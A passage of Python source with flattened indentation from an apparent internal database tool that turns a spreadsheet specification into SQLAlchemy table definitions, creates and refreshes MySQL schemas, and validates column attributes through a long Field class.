print("from sqlalchemy.sql import case, and_, or_, literal", file=module_file)
print("from sqlalchemy.ext.hybrid import hybrid_property", file=module_file)
print("import cep_price_console.db_management.server_utils as server_utils\n\n", file=module_file)
with filename.open("a") as module_file:
filename_statement = "Workbook Filename: {0}\n".format(self.wb_cls.xl_fullpath_pretty)
max_length = 110
fmt_string = "# " + "\n# ".join([filename_statement[i:i + max_length] for i in
range(0, len(filename_statement), max_length)])
print(fmt_string, file=module_file)
print("# Timestamp: {0}".format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")),
file=module_file)
print("\n", file=module_file)
print("class InformReflection(DeferredReflection, server_utils.mysql_base):", file=module_file)
print(" __abstract__ = True\n\n", file=module_file)
for prf_obj in PrimaryReportFile.prf_dict.values():
ArwPrfImporter.logger.log(logging.NOTSET, "Primary Report File: {0}".
format(prf_obj.sheetname))
tbl_obj_lst = \
list(prf_obj.current_tbl_dict.values()) + \
list(prf_obj.archive_tbl_dict.values()) + \
list(prf_obj.static_tbl_dict.values())
for tbl_obj in sorted(tbl_obj_lst, key=lambda x: x.table_name):
ArwPrfImporter.logger.log(logging.NOTSET, "Tablename: {0}".format(tbl_obj.table_name))
if creation:
print(tbl_obj.creation_stmt, file=module_file)
elif mapping:
print(tbl_obj.mapping_stmt, file=module_file)
elif not bool(PrimaryReportFile.prf_dict.values()):
ArwPrfImporter.logger.error("Primary Report File list empty.")
self.investigate_arw_prf_xl()
self.write_module_file(creation, mapping)
@debug(lvl=logging.DEBUG)
def create_schemas(self):
for prf_obj in PrimaryReportFile.prf_dict.values():
prf_obj.create_if_not_exists()
@debug(lvl=logging.DEBUG)
def drop_and_create_all_tables(self):
for prf_obj in PrimaryReportFile.prf_dict.values():
prf_obj.drop_and_create_tables()
@debug(lvl=logging.DEBUG)
def scheduled_script(self):
if hasattr(self, 'session'):
if bool(PrimaryReportFile.prf_dict.values()):
for prf_obj in PrimaryReportFile.prf_dict.values():
prf_obj.update_schema()
schema_create_if_not_exists('pythontest')
self.fill_prod_uom()
elif not bool(PrimaryReportFile.prf_dict.values()):
ArwPrfImporter.logger.error("Primary Report File list empty.")
self.investigate_arw_prf_xl()
self.scheduled_script()
@debug(lvl=logging.DEBUG, prefix='')
def fill_prod_uom(self):
import cep_price_console.db_management.ARW_PRF_Mapping as ARW_PRF_Mapping
base_uom_update = ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.update().where(
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.UOM_Factor_Desc == "1"
).values(
Base_UOM_Factor=ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.UOM,
Base_UOM_Qty=1
)
server_utils.mysql_engine.execute(base_uom_update)
self.session.commit()
# noinspection PyPep8,PyComparisonWithNone
no_base_uom = self.session.query(ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.ID).filter(
and_(ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Factor.is_(None),
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Qty.is_(None)))
while no_base_uom.count() > 0:
# noinspection PyPep8,PyComparisonWithNone
has_base_uom = \
select([ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Prod_Num,
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.UOM,
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.UOM_Qty,
ARW_PRF_Mapping.prod_uom_v2_01_current.Of_UOM,
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Factor,
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Qty,
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.UOM_Factor_Desc]) \
.where(and_(
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Factor.isnot(None),
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Qty.isnot(None))) \
.distinct() \
.alias("has_base_uom")
# for _ in server_utils.mysql_engine.execute(has_base_uom):
# ArwPrfImporter.logger.log(logging.DEBUG, _)
# noinspection PyPep8,PyComparisonWithNone
update_next_uom_level = ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.update().where(and_(
or_(
and_(
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Prod_Num.is_(None),
has_base_uom.c.Prod_Num.is_(None)),
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Prod_Num == has_base_uom.c.Prod_Num),
or_(
and_(
ARW_PRF_Mapping.prod_uom_v2_01_current.Of_UOM.is_(None),
has_base_uom.c.UOM.is_(None)),
ARW_PRF_Mapping.prod_uom_v2_01_current.Of_UOM == has_base_uom.c.UOM),
and_(ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Factor.is_(None),
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Qty.is_(None)))) \
.values(Base_UOM_Factor=has_base_uom.c.Base_UOM_Factor,
Base_UOM_Qty=(has_base_uom.c.Base_UOM_Qty *
ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.UOM_Qty))
server_utils.mysql_engine.execute(update_next_uom_level)
self.session.commit()
@debug(lvl=logging.DEBUG, prefix='')
def recreate(self):
if hasattr(self, 'session'):
self.write_module_file(creation=True)
get_creation_module()
self.create_schemas()
self.drop_and_create_all_tables()
self.write_mapping()
@debug(lvl=logging.DEBUG, prefix='')
def write_mapping(self):
if hasattr(self, 'session'):
self.write_module_file(mapping=True)
self.scheduled_script()
arw_col_list = {
"1": "Name",
"2": "Logical Field",
"3": "Tag",
"4": "Length",
"5": "Nested",
"6": "Description",
"7": "|",
"8": "Column Name",
"9": "Datatype",
"10": "Fill",
"11": "PK",
"12": "Nullable",
"13": "UQ",
"14": "IND",
"15": "B",
"16": "AI",
"17": "G",
"18": "SK",
"19": "Mapping",
"20": "Static Name",
"21": "Default/ Expression",
"22": "Notes"
}
class PrimaryReportFile(object):
logger = CustomAdapter(logging.getLogger(str(__name__)), None)
prf_dict = {}
@debug(lvl=logging.DEBUG, prefix='Primary Report File Initiated')
def __init__(self,
session,
filename):
self.session = session
self.filename = filename.lower()
self.sheetname = filename
self.tbl_init_dict = {}
self.current_tbl_dict = {}
self.archive_tbl_dict = {}
self.static_tbl_dict = {}
PrimaryReportFile.prf_dict[self.sheetname] = self
# @classmethod
# def clear_dict(cls):
# cls.prf_dict = {}
@debug(lvl=logging.DEBUG, prefix='')
def exists(self):
try:
server_utils.mysql_engine.execute("SHOW CREATE SCHEMA `{0}`;".format(self.filename)).scalar()
PrimaryReportFile.logger.log(logging.NOTSET, "Schema Exists: {0}".format(self.filename))
return True
except exc.DBAPIError:
PrimaryReportFile.logger.log(logging.NOTSET, "Schema Does Not Exist: {0}".format(self.filename))
return False
@debug(lvl=logging.DEBUG, prefix='')
def create(self):
PrimaryReportFile.logger.log(logging.NOTSET, "Creating Schema: {0}".format(self.filename))
server_utils.mysql_engine.execute(CreateSchema(self.filename))
@debug(lvl=logging.DEBUG, prefix='')
def create_if_not_exists(self):
if not self.exists():
self.create()
@debug(lvl=logging.DEBUG, prefix='')
def drop_and_create_tables(self):
tbl_lst = \
list(self.current_tbl_dict.values()) + \
list(self.archive_tbl_dict.values()) + \
list(self.static_tbl_dict.values())
for tbl_obj in tbl_lst:
tbl_obj.drop_and_create_if_not_exists()
# ARW_PRF_Mapping.InformReflection.prepare(server_utils.mysql_engine)
@debug(lvl=logging.DEBUG, prefix='')
def update_schema(self):
for current_tbl_obj in self.current_tbl_dict.values():
self.session.commit()
current_tbl_obj.truncate()
current_tbl_obj.append()
for archive_tbl_obj in self.archive_tbl_dict.values():
create_date = datetime.datetime.strptime(creation_date(archive_tbl_obj.filepath), "%Y-%m-%d %H:%M:%S")
max_date_time = archive_tbl_obj.max_date_time()
if create_date != max_date_time:
archive_tbl_obj.append()
archive_tbl_obj.delete_sub_max_date_time()
# for static_tbl_obj in self.static_tbl_dict.values():
# pass
# append static
class Field(object):
logger = CustomAdapter(logging.getLogger(str(__name__)), None)
type_list = (
"BigInteger",
"Boolean",
"Date",
"DateTime",
"Enum",
"Float",
"Integer",
"Interval",
"LargeBinary",
"MatchType",
"Numeric",
"PickleType",
"SchemaType",
"SmallInteger",
"String",
"Text",
"Time",
"Unicode",
"UnicodeText",
"LONGTEXT"
)
@debug(lvl=logging.DEBUG, prefix='')
def __init__(self,
arw_name="",
logical_field="",
tag="",
length="",
nested="",
desc="",
column_name="",
data_type="N/A",
primary_key="",
nullable="",
unique="",
index="",
binary_col="",
fill="",
auto_incremental="",
dflt_exp="", # Don't need it
generated="", # Don't need it
static_key="", # Don't need it
default="", # Don't need it
notes=""):
self.arw_name = arw_name # ARW Name with spaces and such (Column A)
self.logical_field = logical_field # If this is true, don't look for this value in the .csv file (Column B)
self.tag = tag # ARW Tag (Column C)
self.length = length # ARW Length (Not the length associated with datatype) (Column D)
self.nested = nested # ARW value (Column E)
self.desc = desc # ARW Description of field (Column F)
# None of the above fields influence the field's status in the DB
self.column_name = column_name # My assigned name without spaces (check that this is true in setter)(Column H)
self.data_type = data_type # SQL Datatype (convert to SQL Alchemy Datatype) (Column I)
self.primary_key = primary_key # Is this a primary key? (Column K)
self.nullable = nullable # Is this a NotNull field? (Column L)
self.unique = unique # Is this a Unique Index? (Column M)
self.index = index # Is this an Index? (Column N)
self.binary_col = binary_col # Is this a Binary Column? (Column O)
self.fill = fill # Datatype length (Column J)
self.auto_incremental = auto_incremental # Is this field Auto-Incremental? (Column R)
self.generated = generated # Is this field generated? (Column S)
self.static_key = static_key # Is this field a static key? (Column T)
self.default = default # Don't really know
self.dflt_exp = dflt_exp # What is the default expression for this field? (Only used if generated) (Column W)
self.notes = notes # Don't really know (Column X)
self.get_create_field()
# region arw_name ##########################################################################################s######
@property
@debug(lvl=logging.NOTSET)
def arw_name(self):
return self._arw_name
@arw_name.setter
@debug(lvl=logging.NOTSET, prefix="")
def arw_name(self, value):
try:
str_val = str(value)
self._arw_name = str_val.strip()
except ValueError:
raise ValueError("{0}: Value cannot be converted to string: {1}".format("arw_name", value))
# endregion ########################################################################################################
# region logical_field ############################################################################################
@property
@debug(lvl=logging.NOTSET)
def logical_field(self):
return self._logical_field
@logical_field.setter
@debug(lvl=logging.NOTSET, prefix="")
def logical_field(self, value):
try:
str_val = str(value).upper().strip()
if str_val in ("Y", "N"):
self._logical_field = str_val.strip()
else:
raise ValueError("{0}.{1}: Value must be 'Y' or 'N': {2}".
format(self.arw_name, "logical_field", value))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "logical_field", value))
# endregion ########################################################################################################
# region tag ######################################################################################################
@property
@debug(lvl=logging.NOTSET)
def tag(self):
return self._tag
@tag.setter
@debug(lvl=logging.NOTSET, prefix="")
def tag(self, value):
try:
str_val = str(value)
self._tag = str_val.strip()
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "tag", value))
# endregion ########################################################################################################
# region length ###################################################################################################
@property
@debug(lvl=logging.NOTSET)
def length(self):
return self._length
@length.setter
@debug(lvl=logging.NOTSET, prefix="")
def length(self, value):
try:
int_val = int(value)
self._length = int_val
except ValueError:
try:
str_val = str(value)
if str_val.upper().strip() == "N/A":
self._length = None
else:
raise ValueError("{0}.{1}: Value is not 'N/A': {2}".format(self.arw_name, "length", value))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to an integer: {2}"
.format(self.arw_name, "length", value))
# endregion ########################################################################################################
# region nested ###################################################################################################
@property
@debug(lvl=logging.NOTSET)
def nested(self):
return self._nested
@nested.setter
@debug(lvl=logging.NOTSET, prefix="")
def nested(self, value):
try:
str_val = str(value)
self._nested = str_val.strip()
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".format(self.arw_name, "nested", value))
# endregion ########################################################################################################
# region desc #####################################################################################################
@property
@debug(lvl=logging.NOTSET)
def desc(self):
return self._desc
@desc.setter
@debug(lvl=logging.NOTSET, prefix="")
def desc(self, value):
try:
str_val = str(value).replace("'", '"').strip()
str_val = ' '.join(str_val.splitlines())
str_val.strip()
self._desc = str_val
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}"
.format(self.arw_name, "desc", value))
# endregion ########################################################################################################
# region column_name ##############################################################################################
@property
@debug(lvl=logging.NOTSET)
def column_name(self):
return self._column_name
@column_name.setter
@debug(lvl=logging.NOTSET, prefix="")
def column_name(self, value):
try:
str_val = str(value).strip()
if len(str_val) > 64:
raise Exception("{0}.{1}: String length greater than the 64 character limit: {2}"
.format(self.arw_name, "column_name", value))
scrubbed_val = str_val.replace("(", "").replace(")", "").replace("/", "").replace("-", "").replace("#", "")
if str_val == scrubbed_val:
try:
int(scrubbed_val[:1])
except ValueError:
self._column_name = scrubbed_val
else:
raise Exception("{0}.{1}: First character of value cannot be a number: {2}"
.format(self.arw_name, "column_name", value))
else:
raise Exception("{0}.{1}: Value has one of the following illegal characters: {{(, ), /, -, #}}: {2}"
.format(self.arw_name, "column_name", value))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}"
.format(self.arw_name, "column_name", value))
# endregion ########################################################################################################
# region data_type ################################################################################################
@property
@debug(lvl=logging.NOTSET)
def data_type(self):
return self._data_type
@data_type.setter
@debug(lvl=logging.NOTSET, prefix="")
def data_type(self, value):
try:
str_val = str(value)
if str_val.strip() in Field.type_list:
self._data_type = str_val.strip()
else:
raise ValueError("{0}.{1}: Value not in datatype list: {2}"
.format(self.arw_name, "data_type", value))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}"
.format(self.arw_name, "data_type", value))
# endregion ########################################################################################################
# region fill #####################################################################################################
@property
@debug(lvl=logging.NOTSET)
def fill(self):
return self._fill
@fill.setter
@debug(lvl=logging.NOTSET, prefix="")
def fill(self, value):
if self.data_type in (
"BigInteger",
"Boolean",
"Date",
"DateTime",
"Integer",
"SmallInteger",
"Time",
"Text",
"LONGTEXT"
):
if value not in ("", None):
raise ValueError("{0}.{1}: Datatype does not allow for a fill: {2}"
.format(self.arw_name, "fill", self.data_type))
else:
self._fill = None
elif self.data_type in (
"LargeBinary",
"String",
# "Text",
"Unicode",
"UnicodeText",
"Float"
):
if value in ("", None):
raise ValueError("{0}.{1}: Datatype requires a fill: {2}"
.format(self.arw_name, "fill", self.data_type))
else:
try:
int_val = int(value)
if self.data_type == "String" and self.binary_col:
self._fill = "length={0}, collation='binary'".format(str(int_val))
else:
self._fill = "length={0}".format(str(int_val))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to an integer: {2}"
.format(self.arw_name, "fill", value))
elif self.data_type == "Float":
try:
int_val = int(value)
self._fill = "precision={0}".format(str(int_val))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to an integer: {2}"
.format(self.arw_name, "fill", value))
elif self.data_type == "Numeric":
try:
str_val = str(value).strip()
pre_str, scale_str = str_val.split(",")
try:
pre_int = int(pre_str.strip())
scale_int = int(scale_str.strip())
self._fill = "precision={0}, scale={1}".format(str(pre_int), str(scale_int))
except ValueError:
raise ValueError("{0}.{1}: Error with precision or scale integer conversion: "
"precision={2}, scale={3}".
format(self.arw_name, "fill", pre_str, scale_str))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "fill", value))
elif self.data_type in (
"Enum",
"Interval",
"MatchType",
"PickleType",
"SchemaType"
):
raise ValueError("{0}.{1}: What the fuck are you doing using this datatype?: {2}"
.format(self.arw_name, "fill", self.data_type))
# endregion ########################################################################################################
# region primary_key ##############################################################################################
@property
@debug(lvl=logging.NOTSET)
def primary_key(self):
return self._primary_key
@primary_key.setter
@debug(lvl=logging.NOTSET, prefix="")
def primary_key(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "primary_key", value))
if str_val.strip().upper() == "X":
self._primary_key = True
elif str_val.strip().upper() == "":
self._primary_key = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "primary_key", value))
# endregion ########################################################################################################
# region nullable #################################################################################################
@property
@debug(lvl=logging.NOTSET)
def nullable(self):
return self._nullable
@nullable.setter
@debug(lvl=logging.NOTSET, prefix="")
def nullable(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "nullable", value))
if str_val.strip().upper() == "X":
if not self.primary_key:
self._nullable = True
else:
raise ValueError("{0}.{1}: Primary key cannot be nullable: {2}".
format(self.arw_name, "nullable", value))
elif str_val.strip().upper() == "":
self._nullable = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "nullable", value))
# endregion ########################################################################################################
# region unique ###################################################################################################
@property
@debug(lvl=logging.NOTSET)
def unique(self):
return self._unique
@unique.setter
@debug(lvl=logging.NOTSET, prefix="")
def unique(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "unique", value))
if str_val.strip().upper() == "X":
self._unique = True
elif str_val.strip().upper() == "":
self._unique = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "unique", value))
# endregion ########################################################################################################
# region index ####################################################################################################
@property
@debug(lvl=logging.NOTSET)
def index(self):
return self._index
@index.setter
@debug(lvl=logging.NOTSET, prefix="")
def index(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "index", value))
if str_val.strip().upper() == "X":
self._index = True
elif str_val.strip().upper() == "":
self._index = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "index", value))
# endregion ########################################################################################################
# region binary_col ###############################################################################################
@property
@debug(lvl=logging.NOTSET)
def binary_col(self):
return self._binary_col
@binary_col.setter
@debug(lvl=logging.NOTSET, prefix="")
def binary_col(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "binary_col", value))
if str_val.strip().upper() == "X":
if self.data_type in ("String", "Text"):
self._binary_col = True
else:
raise ValueError("{0}.{1}: Only string and text datatypes can be binary: {2}".
format(self.arw_name, "binary_col", self.data_type))
elif str_val.strip().upper() == "":
self._binary_col = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "binary_col", value))
# endregion ########################################################################################################
# region auto_incremental #########################################################################################
@property
@debug(lvl=logging.NOTSET)
def auto_incremental(self):
return self._auto_incremental
@auto_incremental.setter
@debug(lvl=logging.NOTSET, prefix="")
def auto_incremental(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "auto_incremental", value))
if str_val.strip().upper() == "X":
if self.index and self.data_type in (
"BigInteger",
"Boolean",
"Float",
"Integer",
"Numeric",
"SmallInteger"):
self._auto_incremental = True
else:
raise ValueError("{0}.{1}: Autoincremented columns must be indexed and numeric.".
format(self.arw_name, "auto_incremental"))
elif str_val.strip().upper() == "":
self._auto_incremental = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "auto_incremental", value))
# endregion ########################################################################################################
# region generated ################################################################################################
@property
@debug(lvl=logging.NOTSET)
def generated(self):
return self._generated
@generated.setter
@debug(lvl=logging.NOTSET, prefix="")
def generated(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "generated", value))
if str_val.strip().upper() == "X":
if not self.auto_incremental:
self._generated = True
else:
raise ValueError("{0}.{1}: Value cannot be generated and autoincremented: {2}".
format(self.arw_name, "generated", value))
elif str_val.strip().upper() == "":
self._generated = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "generated", value))
# endregion ########################################################################################################
# region static_key ###############################################################################################
@property
@debug(lvl=logging.NOTSET)
def static_key(self):
return self._static_key
@static_key.setter
@debug(lvl=logging.NOTSET, prefix="")
def static_key(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "static_key", value))
if str_val.strip().upper() == "X":
self._static_key = True
elif str_val.strip().upper() == "":
self._static_key = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "static_key", value))
# endregion ########################################################################################################
# region default ##################################################################################################
@property
@debug(lvl=logging.NOTSET)
def default(self):
return self._default
@default.setter
@debug(lvl=logging.NOTSET, prefix="")
def default(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "default", value))
if str_val.strip().upper() == "X":
self._default = True
elif str_val.strip().upper() == "":
self._default = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "default", value))
# endregion ########################################################################################################
# region dflt_exp #################################################################################################
@property
@debug(lvl=logging.NOTSET)
def dflt_exp(self):
return self._dflt_exp
@dflt_exp.setter
@debug(lvl=logging.NOTSET, prefix="")
def dflt_exp(self, value):
try:
str_val = str(value)
self._dflt_exp = str_val.strip()
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "dflt_exp", value))
# endregion ########################################################################################################
# region notes ####################################################################################################
@property
@debug(lvl=logging.NOTSET)
def notes(self):
return self._notes
@notes.setter
@debug(lvl=logging.NOTSET, prefix="")
def notes(self, value):
try:
str_val = str(value)
self._notes = str_val.strip().replace(",", '"')
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "notes", value))
# endregion ########################################################################################################
@debug(lvl=logging.NOTSET, prefix='')
def get_create_field(self):
code_line_list = []
offset = len("Column(")
code_line_list.append("Column('{column_name}',".format(column_name=self.column_name))
if self.fill not in ("", None):
code_line_list.append(
offset * " " + "{data_type}({fill}),".format(data_type=self.data_type, fill=self.fill))
else:
code_line_list.append(offset * " " + "{data_type},".format(data_type=self.data_type))
if self.primary_key:
code_line_list.append(offset * " " + "primary_key=True,")
if self.nullable:
code_line_list.append(offset * " " + "nullable=True,")
if self.index and self.unique:
code_line_list.append(offset * " " + "unique=True,")
code_line_list.append(offset * " " + "index=True,")
else:
if self.index and not self.unique:
code_line_list.append(offset * " " + "index=True,")
if self.unique and not self.index:
code_line_list.append(offset * " " + "unique=True,")
code_line_list.append(offset * " " + "index=True,")
if self.auto_incremental:
code_line_list.append(offset * " " + "autoincrement=True,")
if self.notes not in ("", None):
code_line_list.append(offset * " " + "doc='{notes}',".format(notes=self.notes))
if self.desc not in ("", None):
max_length = 79
fmt_string = textwrap.wrap(self.desc, max_length)
fmt_str_len = len(fmt_string)
for count, line in enumerate(fmt_string, 1):
if count == 1:
if count == fmt_str_len:
code_line_list.append(
offset * " " + "comment='{description}',".format(description=line.strip()))
else:
code_line_list.append(offset * " " + "comment='{description}'".format(description=line.strip()))
elif count == fmt_str_len:
code_line_list.append(offset * " " + " '{description}',".format(description=line.strip()))
else:
code_line_list.append(offset * " " + " '{description}'".format(description=line.strip()))
if not self.generated:
if self.dflt_exp not in (None, "", "None"):
if isinstance(self.dflt_exp, str):
code_line_list.append(offset * " " + "default='{dflt_exp}', ".format(dflt_exp=self.dflt_exp))
else:
Field.logger.log(logging.ERROR, "Figure out what to do with int/float generated columns: {0}"
.format(self.arw_name))
elif self.generated:
if self.dflt_exp in (None, ""):
Field.logger.log(logging.ERROR, "Generated without default expression: {0}".format(self.arw_name))
elif self.dflt_exp not in (None, ""):
code_line_list = []
for line in self.dflt_exp.splitlines():
code_line_list.append("{0}".format(line.replace(" ", " ")))
Field.logger.log(logging.NOTSET, "Code:")
for line in code_line_list:
Field.logger.log(logging.NOTSET, " {code_line}".format(code_line=line))
return code_line_list
final_code_list = []
code_list_len = len(code_line_list)
for line in code_line_list[0:code_list_len - 1]:
final_code_list.append(line)
final_line = code_line_list[code_list_len - 1][:-1] + "),"
final_code_list.append(code_line_list[code_list_len - 1][:-1] + "),")
Field.logger.log(logging.NOTSET, "Code:")
for line in final_code_list:
Field.logger.log(logging.NOTSET, " {code_line}".format(code_line=line))
return final_code_list
@debug(lvl=logging.NOTSET, prefix='')
def convert_csv_value(self, csv_string):
formatted_value = "Unassigned Error"
if csv_string == '':
formatted_value = None
Field.logger.log(logging.NOTSET, "CSV String: {csv_string}, Formatted Value: {formatted_value}".
format(csv_string=csv_string, formatted_value=formatted_value))
else:
if self.data_type in ("Text", "String", "Unicode", "UnicodeText"):
try:
formatted_value = str(csv_string)
except ValueError:
formatted_value = "Error converting to string"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type in ("BigInteger", "Integer", "SmallInteger"):
try:
formatted_value = int(csv_string)
except ValueError:
formatted_value = "Error converting to an integer"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type in ("Numeric", "Float"):
try:
formatted_value = float(csv_string)
except ValueError:
formatted_value = "Error converting to a float"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type == "Boolean":
if csv_string.strip().upper() == "FALSE":
formatted_value = False
elif csv_string.strip().upper() == "TRUE":
formatted_value = True
else:
formatted_value = "Error converting to a boolean"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type in ("LargeBinary", "Enum", "Interval", "MatchType", "PickleType", "SchemaType"):
formatted_value = "Unmapped Datatype"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type == "DateTime":
try:
formatted_value = csv_string
except ValueError:
formatted_value = "Date Conversion Error"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type == "Date":
try:
formatted_value = datetime.datetime.strptime(csv_string, "%m/%d/%Y").date()
except ValueError:
formatted_value = "Date Conversion Error"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type == "Time":
try:
formatted_value = datetime.datetime.strptime(csv_string, "%I:%M%p").time()
except ValueError:
formatted_value = "Date Conversion Error"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
return formatted_value
class ConsoleTable(object):
logger = CustomAdapter(logging.getLogger(str(__name__)), None)
@debug(lvl=logging.NOTSET, prefix='Table Initiated')
def __init__(self,
session,
prf_name,
prf_col,
base_table_name,
table_name=None):
self.session = session
self.prf_name = prf_name
self.prf_col = prf_col
self.base_table_name = base_table_name
self.table_name = table_name
self._mapping_stmt = None
self._creation_stmt = None
self.fields = {}
# region base_table_name ##########################################################################################
@property
@debug(lvl=logging.NOTSET)
def base_table_name(self):
return self._base_table_name
@base_table_name.setter
@debug(lvl=logging.NOTSET, prefix="")
def base_table_name(self, value):
try:
str_value = str(value).lower()
except ValueError:
raise ValueError("{0}: Value cannot be converted to string: {1}".format("base_table_name", value))
else:
self._base_table_name = str_value
# endregion ########################################################################################################
# region table_name ##########################################################################################
@property
@debug(lvl=logging.NOTSET)
def table_name(self):
return self._table_name
@table_name.setter
@debug(lvl=logging.NOTSET, prefix="")
def table_name(self, value):
try:
str_value = str(value).lower()
except ValueError:
raise ValueError("{0}: Value cannot be converted to string: {1}".format("table_name", value))
else:
self._table_name = str_value
self.map = None
self.create = None
# endregion ########################################################################################################
# region prf_name #################################################################################################
@property
@debug(lvl=logging.NOTSET)
def prf_name(self):
return self._prf_name
@prf_name.setter
@debug(lvl=logging.NOTSET)
def prf_name(self, value):
try:
str_value = str(value).lower()
except ValueError:
raise ValueError("{0}: Value cannot be converted to string: {1}".format("prf_name", value))
else:
self._prf_name = str_value
# endregion ########################################################################################################
# region mapping_stmt ##########################################################################################
@property
@debug(lvl=logging.NOTSET)
def mapping_stmt(self):
return self._mapping_stmt
@mapping_stmt.setter
@debug(lvl=logging.NOTSET)
def mapping_stmt(self, _):
if bool(self.fields):
gen_field_lst = []
code = "# noinspection PyPep8Naming\n"
